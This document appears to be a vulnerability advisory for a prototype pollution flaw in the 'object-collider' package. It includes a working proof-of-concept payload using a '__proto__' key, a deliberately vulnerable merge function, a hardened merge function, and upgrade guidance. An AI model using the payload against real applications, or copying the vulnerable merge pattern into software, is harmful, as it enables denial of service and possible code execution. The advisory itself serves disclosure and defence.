Overview
A prototype pollution vulnerability in 'object-collider' versions 1.0.0 through 1.0.3 allows an attacker to cause a denial of service and may lead to remote code execution.
Details
The `collide()` function accepts four arguments. Because the values passed in the `args2` argument are not validated, an attacker can supply a malicious object whose keys include `__proto__`. The property is assigned without first checking whether it is an own property of the target object rather than one reached through the prototype chain, so the nested `polluted` property is written through `__proto__` onto `Object.prototype`, polluting every object that inherits from it. If code elsewhere later checks a `polluted` property, it will read the injected value "Yes! Its Polluted" even on objects that never defined it.
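The bug class described above, shown as an added example that is not object-collider's own code: `naiveMerge` is a hypothetical recursive merge that reproduces the unchecked assignment the advisory describes, and `safeMerge` is a hardened form that only walks own keys, refuses the keys that reach the prototype chain, and never writes through an inherited target. The payload is the same constructed one the PoC uses; `demo` reads `polluted` from a fresh object so that any value it returns can only have come from `Object.prototype`.

```javascript
"use strict";

// Vulnerable (hypothetical stand-in for the unchecked assignment in collide()):
// for-in visits the own "__proto__" key that JSON.parse creates, and
// dst["__proto__"] on a plain object resolves to Object.prototype, so the
// recursion writes the attacker's nested keys into the shared prototype.
function naiveMerge(dst, src) {
  for (const key in src) {
    const value = src[key];
    if (typeof value === "object" && value !== null) {
      if (typeof dst[key] !== "object" || dst[key] === null) dst[key] = {};
      naiveMerge(dst[key], value);
    } else {
      dst[key] = value;
    }
  }
  return dst;
}

// Keys that let a merge reach Object.prototype: "__proto__" directly, and
// "constructor"/"prototype" via obj.constructor.prototype.
const FORBIDDEN_KEYS = new Set(["__proto__", "constructor", "prototype"]);

// Hardened: (1) Object.keys() yields own enumerable keys only; (2) the keys
// above are skipped; (3) a nested target is only reused when it is an own
// property of dst, so an inherited object such as Object.prototype is never
// used as a merge target.
function safeMerge(dst, src) {
  for (const key of Object.keys(src)) {
    if (FORBIDDEN_KEYS.has(key)) continue;
    const value = src[key];
    if (typeof value === "object" && value !== null) {
      const ownTarget =
        Object.prototype.hasOwnProperty.call(dst, key) &&
        typeof dst[key] === "object" &&
        dst[key] !== null;
      if (!ownTarget) dst[key] = {};
      safeMerge(dst[key], value);
    } else {
      dst[key] = value;
    }
  }
  return dst;
}

// Runs one merge against the PoC payload (constructed here) and reports what
// a brand-new, unrelated object sees afterwards. Cleans up the prototype so
// repeated runs start from a clean state.
function demo(merge) {
  const payload = JSON.parse('{"__proto__":{"polluted":"Yes! Its Polluted"}}');
  merge({}, payload);
  const leaked = ({}).polluted;
  delete Object.prototype.polluted;
  return leaked;
}

console.log("naiveMerge leaks:", demo(naiveMerge)); // "Yes! Its Polluted"
console.log("safeMerge leaks:", demo(safeMerge));   // undefined
```

`JSON.parse` is what makes the payload effective: an object literal `{ "__proto__": {...} }` in source code would invoke the `__proto__` setter and change the payload's own prototype, whereas `JSON.parse` creates an ordinary own data property named `__proto__` that a for-in merge then copies.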
PoC Code
var { collide } = require("object-collider");
// JSON.parse creates "__proto__" as an own key of the payload (an object literal would invoke the prototype setter instead)
const payload = JSON.parse('{"__proto__":{"polluted":"Yes! Its Polluted"}}');
var obj = {};
console.log("Before : " + {}.polluted); // undefined
collide(obj, payload);
// Read from a fresh object, not from obj: a value here means Object.prototype itself was polluted
console.log("After : " + {}.polluted);  // "Yes! Its Polluted"
Affected Environments
object-collider versions 1.0.0 through 1.0.3
Prevention
Upgrade to version 1.0.4 or later.